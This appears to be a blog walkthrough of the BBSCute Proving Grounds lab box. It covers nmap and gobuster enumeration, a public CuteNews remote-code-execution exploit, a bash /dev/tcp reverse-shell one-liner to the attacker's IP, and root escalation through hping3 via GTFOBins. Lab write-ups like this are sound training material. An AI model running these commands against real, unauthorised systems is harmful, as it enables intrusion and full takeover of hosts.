PG — BBSCute— Walkthrough (Offensive Security Proving Grounds Play Boxes)

Introduction

This article aims to walk you through BBSCute box, created by foxlox and hosted on Offensive Security’s Proving Grounds Labs. Anyone who has access to Vulnhub and Offensive Security’s Proving Grounds Play or Practice can try to pwn this Linux box, this is a kind of boot2root, easy, and fun box. Hope you enjoy reading the walkthrough!

Reconnaissance

As we are already provided with IP address of the box, we will scan it via Nmap.

Scanning

We are going to scan the IP for 1000 default ports by typing the following command on our terminal.

nmap 192.168.x.x

After a short while, we have got our results as shown below:

Nmap Port Scanning

To gather further information on ports found by nmap, we will add some more arguments specifying open ports. -sV will scan to show service versions of applications on open ports, and -sC will run default scripts on services in order to check whether there is a vulnerability.

nmap -p 22,80,88,110,995 192.168.x.x -sV -sC

Nmap Specified Port Scanning

In a short while, we have got our results and more details regarding open ports. And we decide to start enumeration on port 80 as there is a default apache web server since port 22 is not a logical starting point because it does not provide us with a broad attack surface as an http server does. Port 88, hosting an nginx web server but it throws out 404 Not Found error while trying to connect, is an hhtp server as well, but it does not reveal anything to our interest. Ports 110 and 995 also do not provide us with any useful path to follow.

Enumeration

We open our browser and type IP address of the box.

Default Apache2 Server

Now, we will use gobuster to bruteforce directories to see if we have something useful. We will use -u argument to specify URL and -w argument to provide the wordlist we want to use for directory bruteforcing. And not to create a noise on the server or not to be blocked by the firewall if there is one on the server, we will specify threads as 5 by -t argument.

gobuster dir -u http://192.168x.x/ -w /usr/share/wordlists/dirb/common.txt -t 5

Gobuster Directory Bruteforcing Results

Gobuster reveals several directories, but the only useful one is index.php, and it uncovers a login page.

Enumerating Http Server

After trying to log in with common credentials such as admin:admin, we are not able to log in on the server. Then, we see that under login section of the web page, the name and version number of CMS are visible, which will be investigated further.

CuteNews CMS Enumeration

Thus, we searchsploit the name and version number on our terminal in order to see if there is a public exploit.

CuteNews CMS Enumeration

There are four different public exploits, we will not use Metasploit to maintain our skills sharp and check python script, which is 48800.py, as it gives us the opportunity to have Remote Code Execution (RCE) on the server.

Before attempting to use, we need to change several lines of the exploit code to make it work for our web server. So, the first line, which needs to be altered, is shown below;

Editing Exploit Code 1

As we do not have a directory called /CuteNews on our web server, we will delete it for this and for the following lines, otherwise our python script will not work!

Editing Exploit Code 1.2
Editing Exploit Code 1.3
Editing Exploit Code 1.4
Editing Exploit Code 1.5

We are ready to exploit the web server via the python script we edited.

Exploitation

We execute our python script to connect to the web server:

python3 48800.py

Connecting to the Web Server

The exploit asks for URL of the web server we want to exploit and we provide it. After typing our URL, we hit enter, and we get command execution on the web server.

Getting Command Execution on the Server

To have a netcat shell, we set up a netcat listener on port 443, which is a trustable and secure port, and often works for a reverse shell, in our terminal.

Setting up Netcat Listener

Then, we type the following command to execute on the server for a reverse shell.

echo ‘bash -i >& /dev/tcp192.168.x.x/443 0>&1’ | bash

Getting a Reverse Shell

And, we have got a netcat shell on the web server.

Getting a Netcat Reverse Shell

Now, we can look for our low shell hash with the following command and concatenate it.

find / -name local.txt 2>/dev/null

Reading Low Shell Hash

Privilege Escalation

Privilege Escalation of this box was easy, there are some initial enumeration steps for privilege escalation after getting low shell, and the first one tried on this box, which was checking sudo permissions for the current user by typing sudo -l on the terminal, is the first step for privilege escalation.

Privilege Escalation Enumeration

We see that we can execute hping3 with sudo permissions.

Executing Hping3 with Sudo

Since our low shell is not a TTY shell, we are not able to execute hping3. We will try to get a TTY shell from an interpreter.

We execute /bin/sh -i, and get a TTY shell with the following command.

python3 -c “__import__(‘’pty).spawn(‘/bin/bash’)”

Getting a TTY Shell from Interpreter

Now, we are able to execute hping3, and if we execute it as sudo -l output suggest, it will ask for a password. Since we also see that hping3 has SUID binaries, we check GTFOBins, and see that we are able to execute commands as root user via hping3 terminal.

GTFOBins Hping3 Privilege Escalation

We will get hping3 terminal through just typing hping3, and then we will escalate our privilege as shown below.

Escalating Privilege to Root

As we see, we are able to execute commands as root since our Effective User Id is root. So let us concatenate root hash.

Getting Root Hash

Now we have full authority on the box. Enjoy!

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store